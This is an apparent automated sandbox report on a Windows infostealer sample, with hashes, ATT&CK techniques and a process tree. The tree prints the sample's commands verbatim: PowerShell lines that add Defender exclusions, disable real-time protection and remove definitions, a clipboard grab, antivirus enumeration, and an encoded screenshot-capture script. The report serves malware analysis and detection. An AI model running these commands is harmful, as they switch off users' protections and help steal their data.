a6b304da706f65520019273d5f35dc9ede582febfe9e9a1d87c482eb46433256

Analysis

max time kernel
102s
max time network
146s
platform
windows10-2004_x64
resource
win10v2004-20250314-en
resource tags

arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
submitted
09/04/2025, 08:25

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

0a36d74a1458e8ca334d0c8169ec320e9d7735853a4c0c74660b578a13ee3104.exe
Size

7.5MB
MD5

f5920d004575641148f6d1b7108d330b
SHA1

38ed6696492bcfc67250e952c25cd93948b0baf2
SHA256

0a36d74a1458e8ca334d0c8169ec320e9d7735853a4c0c74660b578a13ee3104
SHA512

db1f6d70e4896c795de66afeb2a4aa53b05bc88407d535028c7edb00f18d777d866c84c004c6a9d42592af0766a9567f54fa3ed49d98f92ebaa623bb3f2daef0
SSDEEP

196608:cYQCwVzNurErvI9pWjgN3ZdahF0pbH1AYtWtQsNo/03WK:UVpurEUWjqeWxi6rbK

Score

8^/10

collection defense_evasion discovery execution spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
1996	powershell.exe
6092	powershell.exe
1604	powershell.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
5468	cmd.exe
1980	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
4316	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
3440	0a36d74a1458e8ca334d0c8169ec320e9d7735853a4c0c74660b578a13ee3104.exe
3440	0a36d74a1458e8ca334d0c8169ec320e9d7735853a4c0c74660b578a13ee3104.exe
3440	0a36d74a1458e8ca334d0c8169ec320e9d7735853a4c0c74660b578a13ee3104.exe
3440	0a36d74a1458e8ca334d0c8169ec320e9d7735853a4c0c74660b578a13ee3104.exe
3440	0a36d74a1458e8ca334d0c8169ec320e9d7735853a4c0c74660b578a13ee3104.exe
3440	0a36d74a1458e8ca334d0c8169ec320e9d7735853a4c0c74660b578a13ee3104.exe
3440	0a36d74a1458e8ca334d0c8169ec320e9d7735853a4c0c74660b578a13ee3104.exe
3440	0a36d74a1458e8ca334d0c8169ec320e9d7735853a4c0c74660b578a13ee3104.exe
3440	0a36d74a1458e8ca334d0c8169ec320e9d7735853a4c0c74660b578a13ee3104.exe
3440	0a36d74a1458e8ca334d0c8169ec320e9d7735853a4c0c74660b578a13ee3104.exe
3440	0a36d74a1458e8ca334d0c8169ec320e9d7735853a4c0c74660b578a13ee3104.exe
3440	0a36d74a1458e8ca334d0c8169ec320e9d7735853a4c0c74660b578a13ee3104.exe
3440	0a36d74a1458e8ca334d0c8169ec320e9d7735853a4c0c74660b578a13ee3104.exe
3440	0a36d74a1458e8ca334d0c8169ec320e9d7735853a4c0c74660b578a13ee3104.exe
3440	0a36d74a1458e8ca334d0c8169ec320e9d7735853a4c0c74660b578a13ee3104.exe
3440	0a36d74a1458e8ca334d0c8169ec320e9d7735853a4c0c74660b578a13ee3104.exe
3440	0a36d74a1458e8ca334d0c8169ec320e9d7735853a4c0c74660b578a13ee3104.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
25	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 3 IoCs

discovery

Process Discovery

T1057

pid	Process
1824	tasklist.exe
5720	tasklist.exe
5948	tasklist.exe

UPX packed file 58 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x00070000000240ca-21.dat	upx
behavioral1/memory/3440-25-0x00007FFB0C750000-0x00007FFB0CE14000-memory.dmp	upx
behavioral1/files/0x00070000000240bd-27.dat	upx
behavioral1/files/0x00070000000240c8-29.dat	upx
behavioral1/files/0x00070000000240c4-48.dat	upx
behavioral1/files/0x00070000000240c3-47.dat	upx
behavioral1/files/0x00070000000240c2-46.dat	upx
behavioral1/files/0x00070000000240c1-45.dat	upx
behavioral1/files/0x00070000000240c0-44.dat	upx
behavioral1/files/0x00070000000240bf-43.dat	upx
behavioral1/files/0x00070000000240be-42.dat	upx
behavioral1/files/0x00070000000240bc-41.dat	upx
behavioral1/files/0x00070000000240cf-39.dat	upx
behavioral1/memory/3440-40-0x00007FFB21710000-0x00007FFB2171F000-memory.dmp	upx
behavioral1/files/0x00070000000240ce-38.dat	upx
behavioral1/files/0x00070000000240cd-37.dat	upx
behavioral1/files/0x00070000000240c9-34.dat	upx
behavioral1/files/0x00070000000240c7-33.dat	upx
behavioral1/memory/3440-30-0x00007FFB1CB30000-0x00007FFB1CB55000-memory.dmp	upx
behavioral1/memory/3440-54-0x00007FFB1C500000-0x00007FFB1C52D000-memory.dmp	upx
behavioral1/memory/3440-56-0x00007FFB1CC20000-0x00007FFB1CC3A000-memory.dmp	upx
behavioral1/memory/3440-58-0x00007FFB1C490000-0x00007FFB1C4B4000-memory.dmp	upx
behavioral1/memory/3440-60-0x00007FFB0C5D0000-0x00007FFB0C74F000-memory.dmp	upx
behavioral1/memory/3440-62-0x00007FFB1C470000-0x00007FFB1C489000-memory.dmp	upx
behavioral1/memory/3440-64-0x00007FFB1C420000-0x00007FFB1C42D000-memory.dmp	upx
behavioral1/memory/3440-66-0x00007FFB132A0000-0x00007FFB132D3000-memory.dmp	upx
behavioral1/memory/3440-73-0x00007FFB0B9A0000-0x00007FFB0BEC9000-memory.dmp	upx
behavioral1/memory/3440-74-0x00007FFB1CB30000-0x00007FFB1CB55000-memory.dmp	upx
behavioral1/memory/3440-71-0x00007FFB0BED0000-0x00007FFB0BF9D000-memory.dmp	upx
behavioral1/memory/3440-70-0x00007FFB0C750000-0x00007FFB0CE14000-memory.dmp	upx
behavioral1/memory/3440-78-0x00007FFB1BC50000-0x00007FFB1BC5D000-memory.dmp	upx
behavioral1/memory/3440-77-0x00007FFB13280000-0x00007FFB13294000-memory.dmp	upx
behavioral1/memory/3440-80-0x00007FFB1CC20000-0x00007FFB1CC3A000-memory.dmp	upx
behavioral1/memory/3440-81-0x00007FFB0B730000-0x00007FFB0B84B000-memory.dmp	upx
behavioral1/memory/3440-82-0x00007FFB1C490000-0x00007FFB1C4B4000-memory.dmp	upx
behavioral1/memory/3440-84-0x00007FFB0C5D0000-0x00007FFB0C74F000-memory.dmp	upx
behavioral1/memory/3440-146-0x00007FFB132A0000-0x00007FFB132D3000-memory.dmp	upx
behavioral1/memory/3440-197-0x00007FFB0BED0000-0x00007FFB0BF9D000-memory.dmp	upx
behavioral1/memory/3440-200-0x00007FFB0B9A0000-0x00007FFB0BEC9000-memory.dmp	upx
behavioral1/memory/3440-239-0x00007FFB1CB30000-0x00007FFB1CB55000-memory.dmp	upx
behavioral1/memory/3440-244-0x00007FFB0C5D0000-0x00007FFB0C74F000-memory.dmp	upx
behavioral1/memory/3440-238-0x00007FFB0C750000-0x00007FFB0CE14000-memory.dmp	upx
behavioral1/memory/3440-237-0x00007FFB0B730000-0x00007FFB0B84B000-memory.dmp	upx
behavioral1/memory/3440-265-0x00007FFB13280000-0x00007FFB13294000-memory.dmp	upx
behavioral1/memory/3440-277-0x00007FFB132A0000-0x00007FFB132D3000-memory.dmp	upx
behavioral1/memory/3440-276-0x00007FFB1C420000-0x00007FFB1C42D000-memory.dmp	upx
behavioral1/memory/3440-275-0x00007FFB1C470000-0x00007FFB1C489000-memory.dmp	upx
behavioral1/memory/3440-274-0x00007FFB0C5D0000-0x00007FFB0C74F000-memory.dmp	upx
behavioral1/memory/3440-273-0x00007FFB1C490000-0x00007FFB1C4B4000-memory.dmp	upx
behavioral1/memory/3440-272-0x00007FFB1CC20000-0x00007FFB1CC3A000-memory.dmp	upx
behavioral1/memory/3440-271-0x00007FFB1C500000-0x00007FFB1C52D000-memory.dmp	upx
behavioral1/memory/3440-270-0x00007FFB21710000-0x00007FFB2171F000-memory.dmp	upx
behavioral1/memory/3440-269-0x00007FFB1CB30000-0x00007FFB1CB55000-memory.dmp	upx
behavioral1/memory/3440-268-0x00007FFB0B9A0000-0x00007FFB0BEC9000-memory.dmp	upx
behavioral1/memory/3440-263-0x00007FFB0BED0000-0x00007FFB0BF9D000-memory.dmp	upx
behavioral1/memory/3440-253-0x00007FFB0C750000-0x00007FFB0CE14000-memory.dmp	upx
behavioral1/memory/3440-267-0x00007FFB0B730000-0x00007FFB0B84B000-memory.dmp	upx
behavioral1/memory/3440-266-0x00007FFB1BC50000-0x00007FFB1BC5D000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
2752	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
4720	systeminfo.exe

Suspicious behavior: EnumeratesProcesses 17 IoCs

pid	Process
1996	powershell.exe
1996	powershell.exe
6092	powershell.exe
6092	powershell.exe
1996	powershell.exe
6092	powershell.exe
1980	powershell.exe
1980	powershell.exe
5760	powershell.exe
5760	powershell.exe
1980	powershell.exe
5760	powershell.exe
1604	powershell.exe
1604	powershell.exe
1604	powershell.exe
5788	powershell.exe
5788	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1996	powershell.exe
Token: SeDebugPrivilege	6092	powershell.exe
Token: SeDebugPrivilege	1980	powershell.exe
Token: SeDebugPrivilege	5948	tasklist.exe
Token: SeIncreaseQuotaPrivilege	1624	WMIC.exe
Token: SeSecurityPrivilege	1624	WMIC.exe
Token: SeTakeOwnershipPrivilege	1624	WMIC.exe
Token: SeLoadDriverPrivilege	1624	WMIC.exe
Token: SeSystemProfilePrivilege	1624	WMIC.exe
Token: SeSystemtimePrivilege	1624	WMIC.exe
Token: SeProfSingleProcessPrivilege	1624	WMIC.exe
Token: SeIncBasePriorityPrivilege	1624	WMIC.exe
Token: SeCreatePagefilePrivilege	1624	WMIC.exe
Token: SeBackupPrivilege	1624	WMIC.exe
Token: SeRestorePrivilege	1624	WMIC.exe
Token: SeShutdownPrivilege	1624	WMIC.exe
Token: SeDebugPrivilege	1624	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1624	WMIC.exe
Token: SeRemoteShutdownPrivilege	1624	WMIC.exe
Token: SeUndockPrivilege	1624	WMIC.exe
Token: SeManageVolumePrivilege	1624	WMIC.exe
Token: 33	1624	WMIC.exe
Token: 34	1624	WMIC.exe
Token: 35	1624	WMIC.exe
Token: 36	1624	WMIC.exe
Token: SeDebugPrivilege	5720	tasklist.exe
Token: SeDebugPrivilege	1824	tasklist.exe
Token: SeDebugPrivilege	5760	powershell.exe
Token: SeIncreaseQuotaPrivilege	1624	WMIC.exe
Token: SeSecurityPrivilege	1624	WMIC.exe
Token: SeTakeOwnershipPrivilege	1624	WMIC.exe
Token: SeLoadDriverPrivilege	1624	WMIC.exe
Token: SeSystemProfilePrivilege	1624	WMIC.exe
Token: SeSystemtimePrivilege	1624	WMIC.exe
Token: SeProfSingleProcessPrivilege	1624	WMIC.exe
Token: SeIncBasePriorityPrivilege	1624	WMIC.exe
Token: SeCreatePagefilePrivilege	1624	WMIC.exe
Token: SeBackupPrivilege	1624	WMIC.exe
Token: SeRestorePrivilege	1624	WMIC.exe
Token: SeShutdownPrivilege	1624	WMIC.exe
Token: SeDebugPrivilege	1624	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1624	WMIC.exe
Token: SeRemoteShutdownPrivilege	1624	WMIC.exe
Token: SeUndockPrivilege	1624	WMIC.exe
Token: SeManageVolumePrivilege	1624	WMIC.exe
Token: 33	1624	WMIC.exe
Token: 34	1624	WMIC.exe
Token: 35	1624	WMIC.exe
Token: 36	1624	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3064	WMIC.exe
Token: SeSecurityPrivilege	3064	WMIC.exe
Token: SeTakeOwnershipPrivilege	3064	WMIC.exe
Token: SeLoadDriverPrivilege	3064	WMIC.exe
Token: SeSystemProfilePrivilege	3064	WMIC.exe
Token: SeSystemtimePrivilege	3064	WMIC.exe
Token: SeProfSingleProcessPrivilege	3064	WMIC.exe
Token: SeIncBasePriorityPrivilege	3064	WMIC.exe
Token: SeCreatePagefilePrivilege	3064	WMIC.exe
Token: SeBackupPrivilege	3064	WMIC.exe
Token: SeRestorePrivilege	3064	WMIC.exe
Token: SeShutdownPrivilege	3064	WMIC.exe
Token: SeDebugPrivilege	3064	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3064	WMIC.exe
Token: SeRemoteShutdownPrivilege	3064	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 6044 wrote to memory of 3440	6044	0a36d74a1458e8ca334d0c8169ec320e9d7735853a4c0c74660b578a13ee3104.exe	88
PID 6044 wrote to memory of 3440	6044	0a36d74a1458e8ca334d0c8169ec320e9d7735853a4c0c74660b578a13ee3104.exe	88
PID 3440 wrote to memory of 4880	3440	0a36d74a1458e8ca334d0c8169ec320e9d7735853a4c0c74660b578a13ee3104.exe	90
PID 3440 wrote to memory of 4880	3440	0a36d74a1458e8ca334d0c8169ec320e9d7735853a4c0c74660b578a13ee3104.exe	90
PID 3440 wrote to memory of 5992	3440	0a36d74a1458e8ca334d0c8169ec320e9d7735853a4c0c74660b578a13ee3104.exe	92
PID 3440 wrote to memory of 5992	3440	0a36d74a1458e8ca334d0c8169ec320e9d7735853a4c0c74660b578a13ee3104.exe	92
PID 4880 wrote to memory of 1996	4880	cmd.exe	94
PID 4880 wrote to memory of 1996	4880	cmd.exe	94
PID 5992 wrote to memory of 6092	5992	cmd.exe	95
PID 5992 wrote to memory of 6092	5992	cmd.exe	95
PID 3440 wrote to memory of 4688	3440	0a36d74a1458e8ca334d0c8169ec320e9d7735853a4c0c74660b578a13ee3104.exe	96
PID 3440 wrote to memory of 4688	3440	0a36d74a1458e8ca334d0c8169ec320e9d7735853a4c0c74660b578a13ee3104.exe	96
PID 3440 wrote to memory of 5840	3440	0a36d74a1458e8ca334d0c8169ec320e9d7735853a4c0c74660b578a13ee3104.exe	97
PID 3440 wrote to memory of 5840	3440	0a36d74a1458e8ca334d0c8169ec320e9d7735853a4c0c74660b578a13ee3104.exe	97
PID 3440 wrote to memory of 5468	3440	0a36d74a1458e8ca334d0c8169ec320e9d7735853a4c0c74660b578a13ee3104.exe	98
PID 3440 wrote to memory of 5468	3440	0a36d74a1458e8ca334d0c8169ec320e9d7735853a4c0c74660b578a13ee3104.exe	98
PID 3440 wrote to memory of 5420	3440	0a36d74a1458e8ca334d0c8169ec320e9d7735853a4c0c74660b578a13ee3104.exe	99
PID 3440 wrote to memory of 5420	3440	0a36d74a1458e8ca334d0c8169ec320e9d7735853a4c0c74660b578a13ee3104.exe	99
PID 3440 wrote to memory of 5568	3440	0a36d74a1458e8ca334d0c8169ec320e9d7735853a4c0c74660b578a13ee3104.exe	100
PID 3440 wrote to memory of 5568	3440	0a36d74a1458e8ca334d0c8169ec320e9d7735853a4c0c74660b578a13ee3104.exe	100
PID 3440 wrote to memory of 1124	3440	0a36d74a1458e8ca334d0c8169ec320e9d7735853a4c0c74660b578a13ee3104.exe	101
PID 3440 wrote to memory of 1124	3440	0a36d74a1458e8ca334d0c8169ec320e9d7735853a4c0c74660b578a13ee3104.exe	101
PID 3440 wrote to memory of 5620	3440	0a36d74a1458e8ca334d0c8169ec320e9d7735853a4c0c74660b578a13ee3104.exe	102
PID 3440 wrote to memory of 5620	3440	0a36d74a1458e8ca334d0c8169ec320e9d7735853a4c0c74660b578a13ee3104.exe	102
PID 3440 wrote to memory of 2556	3440	0a36d74a1458e8ca334d0c8169ec320e9d7735853a4c0c74660b578a13ee3104.exe	103
PID 3440 wrote to memory of 2556	3440	0a36d74a1458e8ca334d0c8169ec320e9d7735853a4c0c74660b578a13ee3104.exe	103
PID 5468 wrote to memory of 1980	5468	cmd.exe	112
PID 5468 wrote to memory of 1980	5468	cmd.exe	112
PID 5420 wrote to memory of 1824	5420	cmd.exe	113
PID 5420 wrote to memory of 1824	5420	cmd.exe	113
PID 5620 wrote to memory of 5760	5620	cmd.exe	114
PID 5620 wrote to memory of 5760	5620	cmd.exe	114
PID 4688 wrote to memory of 5948	4688	cmd.exe	115
PID 4688 wrote to memory of 5948	4688	cmd.exe	115
PID 5840 wrote to memory of 1624	5840	cmd.exe	116
PID 5840 wrote to memory of 1624	5840	cmd.exe	116
PID 2556 wrote to memory of 5720	2556	cmd.exe	117
PID 2556 wrote to memory of 5720	2556	cmd.exe	117
PID 5568 wrote to memory of 2968	5568	cmd.exe	118
PID 5568 wrote to memory of 2968	5568	cmd.exe	118
PID 1124 wrote to memory of 4720	1124	cmd.exe	119
PID 1124 wrote to memory of 4720	1124	cmd.exe	119
PID 3440 wrote to memory of 5740	3440	0a36d74a1458e8ca334d0c8169ec320e9d7735853a4c0c74660b578a13ee3104.exe	121
PID 3440 wrote to memory of 5740	3440	0a36d74a1458e8ca334d0c8169ec320e9d7735853a4c0c74660b578a13ee3104.exe	121
PID 5740 wrote to memory of 2388	5740	cmd.exe	123
PID 5740 wrote to memory of 2388	5740	cmd.exe	123
PID 3440 wrote to memory of 2156	3440	0a36d74a1458e8ca334d0c8169ec320e9d7735853a4c0c74660b578a13ee3104.exe	124
PID 3440 wrote to memory of 2156	3440	0a36d74a1458e8ca334d0c8169ec320e9d7735853a4c0c74660b578a13ee3104.exe	124
PID 2156 wrote to memory of 6096	2156	cmd.exe	126
PID 2156 wrote to memory of 6096	2156	cmd.exe	126
PID 3440 wrote to memory of 2096	3440	0a36d74a1458e8ca334d0c8169ec320e9d7735853a4c0c74660b578a13ee3104.exe	127
PID 3440 wrote to memory of 2096	3440	0a36d74a1458e8ca334d0c8169ec320e9d7735853a4c0c74660b578a13ee3104.exe	127
PID 5760 wrote to memory of 1220	5760	powershell.exe	129
PID 5760 wrote to memory of 1220	5760	powershell.exe	129
PID 2096 wrote to memory of 5360	2096	cmd.exe	130
PID 2096 wrote to memory of 5360	2096	cmd.exe	130
PID 3440 wrote to memory of 5296	3440	0a36d74a1458e8ca334d0c8169ec320e9d7735853a4c0c74660b578a13ee3104.exe	131
PID 3440 wrote to memory of 5296	3440	0a36d74a1458e8ca334d0c8169ec320e9d7735853a4c0c74660b578a13ee3104.exe	131
PID 5296 wrote to memory of 3284	5296	cmd.exe	133
PID 5296 wrote to memory of 3284	5296	cmd.exe	133
PID 1220 wrote to memory of 2940	1220	csc.exe	134
PID 1220 wrote to memory of 2940	1220	csc.exe	134
PID 3440 wrote to memory of 452	3440	0a36d74a1458e8ca334d0c8169ec320e9d7735853a4c0c74660b578a13ee3104.exe	135
PID 3440 wrote to memory of 452	3440	0a36d74a1458e8ca334d0c8169ec320e9d7735853a4c0c74660b578a13ee3104.exe	135

C:\Users\Admin\AppData\Local\Temp\0a36d74a1458e8ca334d0c8169ec320e9d7735853a4c0c74660b578a13ee3104.exe
"C:\Users\Admin\AppData\Local\Temp\0a36d74a1458e8ca334d0c8169ec320e9d7735853a4c0c74660b578a13ee3104.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:6044
- C:\Users\Admin\AppData\Local\Temp\0a36d74a1458e8ca334d0c8169ec320e9d7735853a4c0c74660b578a13ee3104.exe
  "C:\Users\Admin\AppData\Local\Temp\0a36d74a1458e8ca334d0c8169ec320e9d7735853a4c0c74660b578a13ee3104.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:3440
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\0a36d74a1458e8ca334d0c8169ec320e9d7735853a4c0c74660b578a13ee3104.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4880
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\0a36d74a1458e8ca334d0c8169ec320e9d7735853a4c0c74660b578a13ee3104.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1996
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5992
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:6092
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4688
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:5948
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5840
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1624
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    - Suspicious use of WriteProcessMemory
    PID:5468
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1980
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5420
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:1824
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5568
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2968
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1124
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:4720
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkA